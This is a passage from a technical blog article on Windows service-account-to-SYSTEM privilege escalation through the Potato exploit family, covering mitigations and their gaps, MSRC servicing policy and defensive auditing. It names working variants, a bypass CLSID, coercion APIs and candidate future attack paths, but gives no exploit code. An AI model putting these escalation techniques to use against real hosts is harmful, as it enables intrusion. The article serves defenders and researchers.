&lt;p&gt;&lt;code&gt;SERVICE_SID_TYPE_RESTRICTED&lt;/code&gt; is the SCM service-SID setting that wraps the service-process token in a write-restricted restricting-SID set (adding the write-restricted SID &lt;code&gt;S-1-5-33&lt;/code&gt;); for restricted operations the kernel performs the access check twice (once against the regular group SIDs, once against the restricting set) and grants only the intersection. Forshaw&apos;s January 2020 empirical assessment is the canonical study of what these settings actually accomplish: &quot;In the past few years there&apos;s been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege&quot; [@forshaw-2020-01-empirical-wsh].&lt;/p&gt;

A token marked with a *restricting SID* set in addition to its regular group SIDs. The kernel grants access only when both sets satisfy the ACL. Configured per-service via `SERVICE_SID_TYPE_RESTRICTED`; the resulting token is write-restricted (marked with the write-restricted SID `S-1-5-33`), so the restricting set gates write access. The intent is to prevent a compromised service from touching arbitrary objects outside an explicit allow-list of restricting SIDs.
&lt;p&gt;&lt;em&gt;Closes:&lt;/em&gt; the compromised service&apos;s ability to write to (or read, depending on configuration) arbitrary objects outside its restricting-SID set.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Does NOT close:&lt;/em&gt; &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is not revoked. A restricted token can still call &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;. The privilege gate is orthogonal to the restricting-SID gate.&lt;/p&gt;
&lt;h3&gt;6.3 LPAC (Less-Privileged AppContainer) for select services (Windows 10+)&lt;/h3&gt;
&lt;p&gt;Some Microsoft components opt into the AppContainer model with the Less-Privileged variant: the Edge browser broker, certain Defender child processes, parts of the DNS Client and Web Account Manager stacks. Inside an LPAC, the process runs with a deny-all token capabilities profile and must declare every Win32 capability it intends to use. The sibling &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer and LowBox Tokens&lt;/a&gt; article (2026-05-12) covers the model in depth.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Closes:&lt;/em&gt; the attack surface of a few specific Microsoft-shipped contained services.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Does NOT close:&lt;/em&gt; the LOCAL SERVICE and NETWORK SERVICE population this article is about is &lt;strong&gt;not&lt;/strong&gt; LPAC-contained by default. Declaring an LPAC service requires rewriting the service to operate inside an AppContainer, which most product teams do not undertake.&lt;/p&gt;

Building an LPAC service is not a configuration flag; it is an architectural commitment. The service must declare every Win32 capability it uses, must be packaged through the modern app installer pipeline, and must accept the deny-by-default file-system view that the LPAC sandbox enforces. The cost is real for legacy code -- file paths and registry keys the service has historically reached without scrutiny become inaccessible, and IPC patterns that assumed a normal token need to be re-engineered through capability-mediated brokers. Even Microsoft uses LPAC narrowly. Third-party adoption among independent software vendors that ship NETWORK SERVICE workloads is essentially nil. The mitigation that *would* containerise the impersonation surface is technically available; in practice almost nobody uses it.
&lt;h3&gt;6.4 group Managed Service Accounts (gMSA, Server 2012+)&lt;/h3&gt;
&lt;p&gt;gMSA is Microsoft&apos;s solution to the credential-hygiene problem for service accounts: a domain-managed identity whose 240-byte password is rotated automatically by the KDS Root Key, retrieved by authorised hosts via Group Policy, and never typed by a human [@ms-learn-gmsa-overview].&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Closes:&lt;/em&gt; domain-credential exposure for service accounts. A service no longer has a memorable password an admin will reuse; the credential lives in AD and is rotated on a schedule.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Does NOT close:&lt;/em&gt; anything to do with &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; on the local box. gMSA is a credential-hygiene mitigation, not a privilege-escape mitigation. A service running under a gMSA still holds the same default service-account privileges, and the SilverPotato-class cross-host coerce-and-relay flow [@pierini-2024-silverpotato-post; @nvd-cve-2024-38061] directly exploits a chain that gMSA does not protect against (per-variant patches like CVE-2024-38061 close instances, not the class).&lt;/p&gt;
&lt;h3&gt;6.5 CVE-2021-26414 three-phase DCOM hardening&lt;/h3&gt;
&lt;p&gt;CVE-2021-26414 raised the minimum DCOM client authentication level to &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt;. The rollout was deliberately gradual: phase 1 (2021-06-08) opt-in via registry, phase 2 (2022-06-14) opt-out via registry, phase 3 (2023-03-14) enforced with no opt-out [@nvd-cve-2021-26414].&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Closes:&lt;/em&gt; the original RottenPotato and JuicyPotato OBJREF-with-attacker-OXID chain on phase-3-enforced builds. The DCOM activation surface those variants depended on is meaningfully harder after phase 3.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Does NOT close:&lt;/em&gt; anything that does not depend on DCOM activation. &lt;strong&gt;GodPotato&lt;/strong&gt; (RPCSS OXID handling, not DCOM activation) remains functional [@beichendream-godpotato-readme]; &lt;strong&gt;PrintSpoofer / CoercedPotato&lt;/strong&gt; (non-DCOM RPC coercion) remain functional [@labro-2020-printspoofer-post; @prepouce-coercedpotato-repo]; &lt;strong&gt;JuicyPotatoNG&lt;/strong&gt; (September 2022) found a bypass on the DCOM side via the PrintNotify CLSID &lt;code&gt;{854A20FB-2D44-457D-992F-EF13785D2B51}&lt;/code&gt; [@antoniococo-juicypotatong-repo]; &lt;strong&gt;SilverPotato&lt;/strong&gt; used a different CLSID and a cross-host relay until Microsoft fixed it as CVE-2024-38061 in July 2024 [@pierini-2024-silverpotato-post; @nvd-cve-2024-38061] -- a per-variant fix that illustrates exactly why CVE-2021-26414 does not address the cross-host coerce-and-relay class as a whole.&lt;/p&gt;
&lt;h3&gt;6.6 The mitigation that does not exist: &quot;RBAC for services&quot;&lt;/h3&gt;
&lt;p&gt;Windows has shipped no unified RBAC architecture for local services. The SCM provides per-service SDDL controls, the file system and registry provide per-resource ACLs everywhere, and Service SIDs let ACLs name a specific service identity -- but &quot;RBAC for services&quot; as a single named mechanism is non-standard Windows terminology. Azure RBAC and Microsoft Entra RBAC are cloud-side authorisation systems and do not gate the local &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; at all. The §5 Sidenote on the Stage 0a focus-premise retraction covers the audit-trail framing; this subsection states the reader-facing point.&lt;/p&gt;

flowchart TB
    M1[&quot;Service SID Isolation, Vista 2007&quot;]
    M2[&quot;Restricted and Write-Restricted Tokens, Vista 2007 plus MS09-012 backport&quot;]
    M3[&quot;LPAC for select services, Windows 10 plus&quot;]
    M4[&quot;gMSA, Server 2012 plus&quot;]
    M5[&quot;CVE-2021-26414 three-phase DCOM hardening, 2021-2023&quot;]
    Surface1[&quot;Closes lateral movement between same-account services&quot;]
    Surface2[&quot;Closes write access outside restricting-SID set&quot;]
    Surface3[&quot;Closes blast radius of select Microsoft-shipped services&quot;]
    Surface4[&quot;Closes domain-credential exposure&quot;]
    Surface5[&quot;Closes DCOM activation chain, Rotten and Juicy&quot;]
    Core[&quot;Service-account-to-SYSTEM, primitive remains open&quot;]
    M1 --&amp;gt; Surface1
    M2 --&amp;gt; Surface2
    M3 --&amp;gt; Surface3
    M4 --&amp;gt; Surface4
    M5 --&amp;gt; Surface5
    Surface1 -. &quot;does not reach&quot; .-&amp;gt; Core
    Surface2 -. &quot;does not reach&quot; .-&amp;gt; Core
    Surface3 -. &quot;does not reach&quot; .-&amp;gt; Core
    Surface4 -. &quot;does not reach&quot; .-&amp;gt; Core
    Surface5 -. &quot;does not reach&quot; .-&amp;gt; Core
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;th&gt;What it closes&lt;/th&gt;
&lt;th&gt;What it does NOT close&lt;/th&gt;
&lt;th&gt;Primary&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Service SID Isolation (Vista 2007)&lt;/td&gt;
&lt;td&gt;Lateral movement between services sharing an account&lt;/td&gt;
&lt;td&gt;Vertical SYSTEM via NETWORK SERVICE LSASS-cached-token defect&lt;/td&gt;
&lt;td&gt;[@forshaw-2017-08-trustedinstaller; @forshaw-2020-04-sharing-logon-session]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restricted / Write-Restricted Tokens&lt;/td&gt;
&lt;td&gt;Write access to non-restricting-SID objects&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; still present; &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; still works&lt;/td&gt;
&lt;td&gt;[@forshaw-2020-01-empirical-wsh]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LPAC (Windows 10+)&lt;/td&gt;
&lt;td&gt;Select-services blast radius&lt;/td&gt;
&lt;td&gt;NETWORK / LOCAL SERVICE population not LPAC-contained by default&lt;/td&gt;
&lt;td&gt;sibling AppContainer article&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gMSA (Server 2012+)&lt;/td&gt;
&lt;td&gt;Domain-credential exposure&lt;/td&gt;
&lt;td&gt;Local &lt;code&gt;SeImpersonate&lt;/code&gt;; SilverPotato-class cross-host relay&lt;/td&gt;
&lt;td&gt;[@ms-learn-gmsa-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2021-26414 phase 3 (2023-03-14)&lt;/td&gt;
&lt;td&gt;DCOM activation chain (Rotten/Juicy)&lt;/td&gt;
&lt;td&gt;GodPotato (RPCSS), PrintSpoofer (non-DCOM), JuicyPotatoNG (Sept 2022)&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2021-26414]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; None of this section is an indictment of the mitigations. Each one closes a meaningful surface, and a NETWORK SERVICE host with all five active is materially harder to attack than a host without them. But the surface they collectively leave open -- the &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; plus &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; plus coercion-API combination -- is the surface that every shipping Potato variant lives on. The gap is not a missing patch. The gap is the design.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft has shipped five mitigations in nineteen years. Every one narrows the surface around the primitive. None of them closes it. The pattern is too consistent to be accidental. So what is the policy that produces this pattern?&lt;/p&gt;
&lt;h2&gt;7. The MSRC Servicing-Criteria Carve-Out&lt;/h2&gt;

Most of these exploits allow an attacker to break the WSH (Windows Service Hardening) boundary, enabling privilege escalation from a limited service to SYSTEM: a common scenario when dealing with web services like IIS or MSSQL. Interestingly, Microsoft does not consider WSH a security boundary but rather a safety boundary; for this reason, many Potato exploits work (and have been working) on fully updated Windows systems. -- Andrea Pierini and Antonio Cocomazzi, Troopers 24 [@pierini-cocomazzi-troopers24-talk]
&lt;p&gt;This is the Microsoft-position-as-stated-to-researchers anchor for the entire article. The MSRC Windows Security Servicing Criteria page [@msrc-windows-security-servicing-criteria] is the policy-document anchor with the same content: the two-question test &quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature? Does the severity of the vulnerability meet the bar for servicing?&quot; If either answer is no, the vulnerability is considered for the next version of Windows but is not addressed through a security update.&lt;/p&gt;
&lt;p&gt;Service-to-SYSTEM escalation across the Windows Service Hardening boundary is not a violation of a &lt;em&gt;security boundary&lt;/em&gt;. It is a violation of a &lt;em&gt;safety boundary&lt;/em&gt;. The distinction is doctrinal and explicit. Microsoft will fix specific token-source primitives -- LocalPotato got CVE-2023-21746, FakePotato got CVE-2024-38100 -- but the class is, on the record, not within scope for security servicing [@nvd-cve-2023-21746; @nvd-cve-2024-38100].&lt;/p&gt;
&lt;p&gt;Why? Walk through each of the three closure paths Microsoft could in principle take, and the cost of each.&lt;/p&gt;
&lt;h3&gt;7.1 Revoke &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; from NETWORK SERVICE and LOCAL SERVICE&lt;/h3&gt;
&lt;p&gt;The cleanest fix in the model: drop the privilege from the default-assignment list documented on the LOCAL SERVICE and NETWORK SERVICE account pages [@ms-learn-localservice; @ms-learn-networkservice]. Every Potato variant that ends in &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; fails immediately.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost.&lt;/em&gt; Every RPC server, web server, database server, and Office service that needs to act on a client&apos;s behalf breaks. The privilege exists &lt;em&gt;because&lt;/em&gt; services need it. IIS application pools cannot impersonate authenticated users; SQL Server cannot enforce per-login row security; Exchange cannot operate on mailboxes under the connected user&apos;s identity; the print spooler cannot enforce per-user printer ACLs; the file server cannot enforce per-user file ACLs. The 2003 service-hardening pivot would be reversed -- services would have to run as SYSTEM again to do the work they need to do, which is precisely the worm-target population Microsoft spent the early 2000s migrating away from.&lt;/p&gt;
&lt;h3&gt;7.2 Declare local DCOM activation a security boundary and service it&lt;/h3&gt;
&lt;p&gt;This was the partial path Microsoft did take with CVE-2021-26414 [@nvd-cve-2021-26414]: tighten the DCOM activation surface and ship the change in three phases over twenty-one months. But declaring &lt;em&gt;all&lt;/em&gt; local DCOM activation a security boundary requires a serviceable-CVE pipeline for every cross-session COM activation, every cross-integrity-level activation, every weakly-authenticated marshalled OBJREF.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost.&lt;/em&gt; MSRC has declined to take on that workload. The on-the-record case is RemotePotato0 [@antoniococo-remotepotato0-repo], which was classified &quot;Won&apos;t Fix&quot; by MSRC as the first explicit declination in the lineage -- documented in Forshaw&apos;s 2021 retrospective as still unpatched at the time of writing [@forshaw-2021-10-relaying-dcom-pz]. RemotePotato0 is the empirical evidence that Microsoft has chosen to live with a known cross-session DCOM relay rather than commit to a structural close.&lt;/p&gt;
&lt;h3&gt;7.3 Deprecate &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Remove the named-pipe-server impersonation API from the Win32 surface. Mark it deprecated. Stop callers from using it. Provide a replacement that requires explicit per-request token plumbing.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Cost.&lt;/em&gt; Most Win32 RPC servers stop being able to impersonate their callers. The SMB redirector, the Print Spooler, the EFS RPC server, and a long tail of named-pipe RPC servers depend on this specific API; their alternatives all compose into the same kernel-side call. The replacement -- a per-request capability handle threading through every RPC binding -- would be a multi-year ABI change with no clean migration path for legacy binaries.&lt;/p&gt;

flowchart LR
    Start[&quot;Closure path&quot;]
    A[&quot;A. Revoke SeImpersonatePrivilege from NETWORK SERVICE and LOCAL SERVICE&quot;]
    B[&quot;B. Declare local DCOM activation a security boundary, service every CVE&quot;]
    C[&quot;C. Deprecate ImpersonateNamedPipeClient&quot;]
    Cost1[&quot;Breaks IIS, Exchange, MSSQL, Office services&quot;]
    Cost2[&quot;Per-CVE servicing pipeline for every cross-session COM activation, MSRC has declined&quot;]
    Cost3[&quot;Breaks SMB redirector, Print Spooler, EFS, every named-pipe RPC server that impersonates&quot;]
    Converge[&quot;Compatibility cost Microsoft has not accepted&quot;]
    Start --&amp;gt; A
    Start --&amp;gt; B
    Start --&amp;gt; C
    A --&amp;gt; Cost1 --&amp;gt; Converge
    B --&amp;gt; Cost2 --&amp;gt; Converge
    C --&amp;gt; Cost3 --&amp;gt; Converge
&lt;p&gt;RemotePotato0 [@antoniococo-remotepotato0-repo] holds a particular place in the lineage because it is the first variant for which MSRC&apos;s &quot;Won&apos;t Fix&quot; classification became public on the record. Forshaw&apos;s 2021 Project Zero retrospective notes the variant as &quot;currently unpatched as of October 2021&quot; [@forshaw-2021-10-relaying-dcom-pz], and Microsoft did not subsequently issue a CVE for it. The Stage 5 outline cross-references the sibling Potato Family article (2026-05-31) for variant detail; in this article RemotePotato0 functions as the empirical proof that the carve-out is not a hypothetical preference but a shipped policy choice.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Nineteen years. Five mitigations. Three closure paths Microsoft has explicitly declined to take. The primitive is not unpatched. It is documented-as-policy not to be patched.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft has chosen, on the record, to treat this boundary as a safety boundary rather than a security boundary. Is that an architectural failure -- or is it a rational policy choice under a deeper structural constraint? Hardy 1988 has an answer.&lt;/p&gt;
&lt;h2&gt;8. The Hardy Ceiling&lt;/h2&gt;
&lt;p&gt;Norm Hardy named the class in 1988. Forty years later, Windows is still demonstrating it. The confused-deputy attack surface is not a Microsoft mistake; it is the predictable behaviour of any identity-and-ACL system in which a server holds more authority than its clients and acts on client requests [@hardy-1988].&lt;/p&gt;
&lt;p&gt;The argument generalises beyond Windows. Any system that lets a process inherit ambient authority from its identity, and then lets that process act on requests from less-authorised principals, has a confused-deputy surface by construction. The only complete defence is capability discipline: bind authority to operations rather than to running identities, and never let a process exercise authority it was not explicitly handed [@hardy-1988]. Lampson&apos;s 1971 access-matrix paper is the formal substrate the argument depends on [@lampson-1971].&lt;/p&gt;
&lt;p&gt;Windows is not a capability system. It is an identity-and-ACL system, as Cutler&apos;s NT 3.1 team chose in 1993 [@ms-learn-windows-internals]. As long as that remains true, &lt;em&gt;some&lt;/em&gt; version of &quot;service-account to higher-privileged identity&quot; is reachable, and the only question is which specific token-source primitive is currently in play. Microsoft&apos;s eighteen-year per-CVE response cadence is consistent with that ceiling. Each individual token source is fixable; the class is not.&lt;/p&gt;

The capability-systems lineage -- KeyKOS, EROS, Coyotos, seL4 -- spent four decades demonstrating that the confused-deputy class is closeable in principle. In a capability system, when Hardy&apos;s user passed the FORTRAN compiler the path to the billing file as a debug-output target, the OS would have handed the compiler a write capability only for the file the *user* could write -- not for `(SYSX)BILL`. The compiler could not have damaged the bill even if it tried. seL4 has a machine-checked proof of this property. But none of those systems is the Windows service-compatibility envelope, and porting Windows to a capability substrate is not on any public roadmap. The road exists; Microsoft has not taken it.
&lt;p&gt;The closest in-architecture approximations Windows has shipped are narrow: AppContainer and LowBox tokens (the sibling AppContainer article 2026-05-12) bind a subset of authority to declared capabilities for select Microsoft components; the &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless / Administrator Protection feature&lt;/a&gt; (sibling Adminless article 2026-05-10) binds elevation authority to per-action prompts for interactive admins. Both are partial applications of the capability principle within an otherwise identity-and-ACL system. Neither extends to the service-account population this article is about.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Windows is an identity-and-ACL system. As long as it remains one, the confused-deputy class is structurally present, and the Potato lineage is its Windows-specific instantiation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the ceiling is structural and Microsoft has chosen the doctrine to match, what is the offensive-research community working on next? And what should defenders be doing in the meantime?&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;The closure of LocalPotato in 2023, SilverPotato (CVE-2024-38061) in July 2024, and FakePotato (CVE-2024-38100) in July 2024 did not slow the lineage. GodPotato remains functional. The supply of coercion APIs is structurally large. Microsoft has shipped no policy change. The four open questions below define what the lineage looks like through the rest of the decade.&lt;/p&gt;
&lt;h3&gt;9.1 The coercion-API treadmill&lt;/h3&gt;
&lt;p&gt;Generation 4 demonstrated that any Windows RPC interface accepting an attacker-supplied path or endpoint and resolving it server-side under a privileged identity is a viable token source. CoercedPotato&apos;s MS-EFSR catalogue alone lists fourteen entry points (two marked NOT WORKING) [@prepouce-coercedpotato-repo], with additional protocols (MS-RPRN, MS-FSRVP, MS-DFSNM) in the same family. Microsoft patches per CVE -- PrintNightmare cluster around MS-RPRN, targeted MS-EFSR fixes -- but the supply is not exhausted, and there is no public Microsoft commitment to exhaustive enumeration or class-level closure.&lt;/p&gt;
&lt;h3&gt;9.2 GodPotato&apos;s RPCSS OXID path&lt;/h3&gt;
&lt;p&gt;Three years after the three-phase CVE-2021-26414 DCOM hardening completed [@nvd-cve-2021-26414], GodPotato remains functional across the README&apos;s tested Windows matrix (Server 2012-2022 / Windows 8-11) [@beichendream-godpotato-readme]. No public Microsoft patch has been issued for the underlying defect through mid-2026. The architectural question -- is RPCSS itself the right place to harden, or is the LSASS cached-token defect Forshaw documented in April 2020 [@forshaw-2020-04-sharing-logon-session] the right place -- remains open. Microsoft has assigned no CVE.&lt;/p&gt;
&lt;h3&gt;9.3 Credential Guard does not stop this&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; protects the &lt;em&gt;NTLM hash and Kerberos TGT&lt;/em&gt; in the LSASS Isolated User Mode trustlet. It does &lt;strong&gt;not&lt;/strong&gt; protect against runtime impersonation of an already-issued token. The boundary between credential-theft mitigations and impersonation mitigations is frequently confused.&lt;/p&gt;
&lt;p&gt;Credential Guard&apos;s actual scope is narrower than its name suggests. The mitigation moves long-term authenticators -- the NT hash, the Kerberos TGT, and certain ticket-granting material -- into an isolated user-mode trustlet whose memory the regular kernel cannot read. None of that touches the runtime token plumbing the Potato lineage exercises. The token you receive from &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; is not a credential and is not held in LSASS-isolated memory; Credential Guard cannot see it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Practitioners frequently treat Credential Guard and Virtualisation-Based Security as a generic answer to &quot;Windows privilege-escalation risk.&quot; For the Potato family they are not. A Credential-Guard-enabled host that runs IIS as NETWORK SERVICE is as vulnerable to PrintSpoofer / CoercedPotato / GodPotato as a host without VBS. The category error matters operationally: a security team that buys Credential Guard expecting it to mitigate this primitive is misallocating defensive budget.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.4 The &quot;service boundary&quot; re-definition Microsoft has quietly avoided&lt;/h3&gt;
&lt;p&gt;Adminless / Administrator Protection -- the 2024-2025 feature that re-frames local admin identity as a per-action consent surface [@ms-learn-admin-protection] (covered in the sibling Adminless article 2026-05-10) -- explicitly excludes services from its new boundary.&lt;/p&gt;
&lt;p&gt;The Adminless documentation scopes the feature to interactive administrator accounts on a device [@ms-learn-admin-protection]; services, MSAs, gMSAs, and virtual accounts are out of scope by construction because none of them is an interactive admin account. The new boundary applies to elevation-prompt consent for interactive admins, not to service-account workloads. The open question is whether Microsoft will ever extend the Adminless boundary to include service accounts. As of mid-2026, the answer is &lt;em&gt;not on the public roadmap&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;9.5 Generation-6 candidates&lt;/h3&gt;
&lt;p&gt;Three candidate paths for the next generation of the lineage, none with a pushbutton PoC on the scale of HotPotato / JuicyPotato / PrintSpoofer / GodPotato as of mid-2026:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Kerberos-only loopback coercion.&lt;/em&gt; The existing NTLM-reflection mitigations target NTLM specifically; a coercion primitive that lands as a Kerberos AP-REQ to the same loopback endpoint would sidestep them.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Virtual-account / gMSA token-state defects.&lt;/em&gt; Forshaw&apos;s April 2020 analysis [@forshaw-2020-04-sharing-logon-session] established that the LSASS cached-token logic has surprising behaviours under same-machine authentication; the gMSA-account variant of those edge cases has not been publicly explored.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Cross-host extensions beyond ADCS.&lt;/em&gt; SilverPotato&apos;s coerce-and-relay chain into ADCS infrastructure [@pierini-2024-silverpotato-post] -- patched as CVE-2024-38061 in July 2024 [@nvd-cve-2024-38061] but exemplifying an open class -- is the strongest current exemplar for the &quot;Generation 6&quot; archetype: cross-host coerce-and-relay attacks that combine the existing local impersonation primitive with off-box authentication targets. LDAP, WinRM, and MSSQL-with-cert-auth are obvious next targets for the same class; what matters for taxonomy is the cross-host shape, not the patched-or-unpatched status of any specific variant.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If the lineage is not closing, what should a defender actually do today?&lt;/p&gt;
&lt;h2&gt;10. Defending, Detecting, and (Carefully) Removing the Privilege&lt;/h2&gt;
&lt;p&gt;Three operational questions: which accounts hold the privilege on your box, can you remove it, and how do you detect when someone is actually using it?&lt;/p&gt;
&lt;h3&gt;10.1 Auditing which accounts hold &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The first defensive action is enumeration -- not removal. Concrete commands, in increasing order of detail:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;whoami /priv&lt;/code&gt; -- per-process self-check from any shell. Reports the token&apos;s privileges in the form the article opens with.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;secedit /export /cfg secpol.cfg&lt;/code&gt; -- full local-policy export. Grep the output for &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; to see every SID the local policy grants it to.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;accesschk.exe -a SeImpersonatePrivilege&lt;/code&gt; -- the Sysinternals AccessChk tool [@ms-learn-accesschk] enumerates the effective holders directly from the LSA policy database.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Get-NtTokenPrivileges&lt;/code&gt; from James Forshaw&apos;s NtObjectManager PowerShell module [@forshaw-ntobjectmanager-repo] -- the same data, scriptable, with the broader NtObjectManager surface available for follow-up (named-pipe enumeration, token-handle leak search, kernel-object introspection).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Invoke-PrivescCheck&lt;/code&gt; from Clement Labro&apos;s PrivescCheck module [@labro-privesccheck-repo] -- the canonical local-privesc check-list. The output includes &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; presence as one of approximately forty enumerated checks.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Author&lt;/th&gt;
&lt;th&gt;What it reports&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;AccessChk (Sysinternals)&lt;/td&gt;
&lt;td&gt;Mark Russinovich&lt;/td&gt;
&lt;td&gt;Effective permissions, account-privilege enumeration via &lt;code&gt;-a&lt;/code&gt; [@ms-learn-accesschk]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NtObjectManager&lt;/td&gt;
&lt;td&gt;James Forshaw&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Get-NtTokenPrivilege&lt;/code&gt;, named-pipe enumeration, token-handle leak search [@forshaw-ntobjectmanager-repo]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PrivescCheck&lt;/td&gt;
&lt;td&gt;Clement Labro&lt;/td&gt;
&lt;td&gt;Canonical local-privesc check-list incl. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; presence [@labro-privesccheck-repo]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;{`
// Logic of: secedit /export /cfg secpol.cfg ; grep SeImpersonate
const secpol = readPolicyExport();              // produced by secedit
const holders = secpol[&apos;SeImpersonatePrivilege&apos;] || [];&lt;/p&gt;
&lt;p&gt;console.log(&apos;SIDs holding SeImpersonatePrivilege:&apos;);
for (const sid of holders) {
  console.log(&apos;  &apos; + sid);
}&lt;/p&gt;
&lt;p&gt;// Typical default on a server-style install:
//   S-1-5-19   (NT AUTHORITY\LOCAL SERVICE)
//   S-1-5-20   (NT AUTHORITY\NETWORK SERVICE)
//   S-1-5-32-544 (BUILTIN\Administrators)
//   S-1-5-6    (NT AUTHORITY\SERVICE)
`}&lt;/p&gt;
&lt;h3&gt;10.2 Removing the privilege where you can&lt;/h3&gt;
&lt;p&gt;The policy path is documented: &lt;code&gt;Computer Configuration -&amp;gt; Windows Settings -&amp;gt; Security Settings -&amp;gt; Local Policies -&amp;gt; User Rights Assignment -&amp;gt; Impersonate a client after authentication&lt;/code&gt; [@ms-learn-impersonate-policy]. The temptation, especially after reading an article like this one, is to remove &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; from NETWORK SERVICE wholesale.&lt;/p&gt;
&lt;p&gt;Do not do that. It will break IIS, Exchange, SQL Server, and most other Windows server products -- the same set the 2003 service-hardening pivot was designed to support. The realistic defensive approach is narrower: &lt;em&gt;audit first&lt;/em&gt;, &lt;em&gt;understand the dependency surface&lt;/em&gt;, then &lt;em&gt;narrow the assignment to the specific service accounts that need it&lt;/em&gt; on the specific hosts where they run. On hosts that do not run an RPC-impersonating workload (jump boxes, build agents, certain hardened-management hosts), the privilege can sometimes be removed safely from the unused well-known accounts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most common mistake after reading any Potato writeup is to remove the privilege from NETWORK SERVICE on a production host. Doing so breaks IIS (per-user authentication fails), Exchange (mailbox impersonation fails), SQL Server (per-login row security fails), the SMB redirector (file-server impersonation fails), the Print Spooler (per-user printer ACLs fail), and most third-party Win32 service products. The privilege exists because services need it. Audit before you remove. Remove only after you have positively identified which production services on this host depend on the privilege and confirmed none of them does.&lt;/p&gt;
&lt;/blockquote&gt;

